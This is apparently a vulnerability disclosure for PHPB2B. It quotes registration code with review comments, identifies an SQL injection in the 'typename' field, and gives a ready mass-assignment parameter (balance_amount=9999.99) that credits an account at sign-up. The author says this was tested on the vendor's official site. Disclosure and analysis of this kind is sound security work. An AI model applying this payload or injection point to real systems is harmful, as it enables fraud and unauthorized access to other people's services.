PHPB2B latest version: SQL injection, unlimited recharge (demonstrated successfully on the official website)
As the title says.
Detailed description:
Look at the user registration code:
// Registration handler (excerpt: the enclosing if-block is not closed within this listing).
// Runs when the POST field 'register' is present.
if(isset($_POST['register'])){
$is_company = false;
$if_need_check = false;
// Both values are taken straight from the request and are only trimmed here.
$register_type = trim($_POST['register']);
$register_typename = trim($_POST['typename']);
// NOTE(review): pb_submit_check() is not shown; presumably a form-submission check. Confirm what it validates.
pb_submit_check('data');
// SECURITY: $register_typename is concatenated into a quoted SQL literal and no escaping is
// visible in this excerpt. Unless the value is escaped elsewhere, this is an injection point;
// it should be escaped or bound as a parameter.
$default_membergroupid_res = $pdb->GetRow("SELECT * FROM {$tb_prefix}membertypes WHERE name='".$register_typename."'");
$default_membergroupid = $default_membergroupid_res['default_membergroup_id'];
// Fall back to the group flagged is_default=1 when the member type has no default group.
if(empty($default_membergroupid)) $default_membergroupid = $membergroup->field("id","is_default=1");
// A member type id above 1 is treated as a company registration.
if ($default_membergroupid_res['id']>1) {
$is_company = true;
}
// NOTE(review): setParams() is not shown; the rest of the page implies it copies the submitted
// data[...] array into ->params. Confirm, because every key it accepts reaches Add().
$member->setParams();
$memberfield->setParams();
// Only the keys assigned below are overwritten server-side; any other key already present
// under params['data']['member'] keeps its value.
$member->params['data']['member']['membergroup_id'] = $default_membergroupid;
// $default_membergroupid is interpolated unquoted. It comes from the row or field() lookup above
// rather than directly from the request, but an (int) cast would make the query safe by construction.
$time_limits = $pdb->GetOne("SELECT default_live_time FROM {$tb_prefix}membergroups WHERE id={$default_membergroupid}");
$member->params['data']['member']['service_start_date'] = $time_stamp;
$member->params['data']['member']['service_end_date'] = $membergroup->getServiceEndtime($time_limits);
$member->params['data']['member']['membertype_id'] = ($is_company)?2:1;
// Status 0 plus $if_need_check when registration needs approval, status 1 otherwise.
// NOTE(review): the =="1" test appears redundant next to the loose !=0 test that follows it.
if($member_reg_auth=="1" || $member_reg_auth!=0 || !empty($G['setting']['new_userauth'])){
$member->params['data']['member']['status'] = 0;
$if_need_check = true;
}else{
$member->params['data']['member']['status'] = 1;
}
// The initial false is immediately replaced by the result of Add().
$updated = false;
$updated = $member->Add();
The Add() method:
/**
 * Builds a member record from $this->params['data']['member'] and hands it to save().
 * Excerpt: the function body continues past the end of this listing.
 *
 * Returns false when username, userpass or email is empty; the return value on the
 * other paths is outside this excerpt.
 */
function Add()
{
global $_PB_CACHE, $memberfield, $phpb2b_auth_key, $if_need_check;
$error_msg = array();
// Required fields: bail out if any of them is missing or empty.
if (empty($this->params['data']['member']['username']) or
empty($this->params['data']['member']['userpass']) or
empty($this->params['data']['member']['email'])) return false;
$space_name = $this->params['data']['member']['username'];
$userpass = $this->params['data']['member']['userpass'];
// NOTE(review): authPasswd() is not shown; presumably it hashes the password. Confirm the scheme.
$this->params['data']['member']['userpass'] = $this->authPasswd($this->params['data']['member']['userpass']);
// Derive space_name from the username when the request did not supply one.
if(empty($this->params['data']['member']['space_name']))
$this->params['data']['member']['space_name'] = PbController::toAlphabets($space_name);//Todo:
$uip = pb_ip2long(pb_getenv('REMOTE_ADDR'));
// NOTE(review): no exit follows the redirect here; unless pheader() terminates the request,
// execution continues with an empty $uip.
if(empty($uip)){
pheader("location:".URL."redirect.php?message=".urlencode(L('sys_error')));
}
$this->params['data']['member']['last_login'] = $this->params['data']['member']['created'] = $this->params['data']['member']['modified'] = $this->timestamp;
$this->params['data']['member']['last_ip'] = pb_get_client_ip('str');
// NOTE(review): flash() is not shown; if it does not stop the request, a duplicate e-mail
// still falls through to the username check and possibly to save().
$email_exists = $this->checkUserExistsByEmail($this->params['data']['member']['email']);
if ($email_exists) {
flash("email_exists", null, 0);
}
$if_exists = $this->checkUserExist($this->params['data']['member']['username']);
if ($if_exists) {
flash('member_has_exists', null, 0);
}else{
// SECURITY: the whole member array is passed on, including any key the client added to
// data[member] (the page's example is balance_amount). Nothing in this excerpt restricts
// it to an allow-list of registrable fields; filtering to known keys before save() would
// keep server-controlled columns out of reach of the request.
$this->save($this->params['data']['member']);
The save() function then iterates over our POST data with foreach:
/**
 * Iterates over $data and forwards selected keys to $this->add().
 * Excerpt: the loop and the function are not closed within this listing.
 *
 * Returns false when $data is empty; other return paths are outside this excerpt.
 *
 * NOTE(review): this signature takes three arguments, while the Add() listing quoted earlier
 * on the page calls save() with one. Confirm that this is the method reached from Add().
 */
function save($obj_name, $obj_id, $data)
{
if (empty($data)) {
return false;
}
foreach ($data as $key=>$val) {
// In the visible part only 'title', 'keyword' and 'description' are forwarded to add();
// other keys are skipped. in_array() is called without the strict flag.
if (in_array($key, array('title', 'keyword', 'description'))) {
$this->add($obj_id, $obj_name, $key, $val);
}
Tested on the official website.
When registering a user, capture the request and add the parameter:
data%5Bmember%5D%5Bbalance_amount%5D=9999.99
The account is then recharged.
Proof of vulnerability:
Solution:
The vendor is better placed to choose the fix.